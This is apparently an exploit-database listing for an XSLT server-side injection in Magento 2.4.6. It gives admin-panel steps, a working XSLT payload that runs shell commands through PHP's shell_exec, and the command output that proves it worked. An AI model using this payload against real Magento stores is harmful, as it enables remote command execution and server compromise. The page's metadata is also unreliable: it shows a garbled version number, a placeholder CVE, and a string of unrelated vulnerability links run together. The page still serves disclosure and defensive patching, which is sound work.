header-logo
Suggest Exploit
vendor:
Magento
by:
tmrswrr
8.1
CVSS
CRITICAL
Server Side Injection
91
CWE
Product Name: Magento
Affected Version From: 2.4.2006
Affected Version To: 2.4.2006
Patch Exists: NO
Related CWE: CVE-2023-XXXX (Not a real CVE, placeholder)
CPE: magento:2.4.6
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2024-1597/https://www.rapid7.com/db/vulnerabilities/mediawiki-cve-2024-23174/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-43358/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL9-unaffected/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23504/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL8-unaffected/https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/suse-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/red_hat-jboss_eap-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2017-9788/https://www.rapid7.com/db/?q=placeholder)&type=&page=2https://www.rapid7.com/db/?q=placeholder)&type=&page=2
Other Scripts:
Platforms Tested:
2023

Magento ver. 2.4.6 – XSLT Server Side Injection

The vulnerability allows an authenticated admin user to perform a server-side injection attack by exploiting the XSLT configuration feature. By crafting a malicious XSLT payload, the attacker can execute arbitrary commands on the server.

Mitigation:

To mitigate this vulnerability, restrict access to the admin panel to trusted users only and sanitize user inputs to prevent malicious XSLT payloads.
Source

Exploit-DB raw data:

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6

## POC

1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>```

##RESULT
  
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Navigation

Suggest Exploit

Services By CQR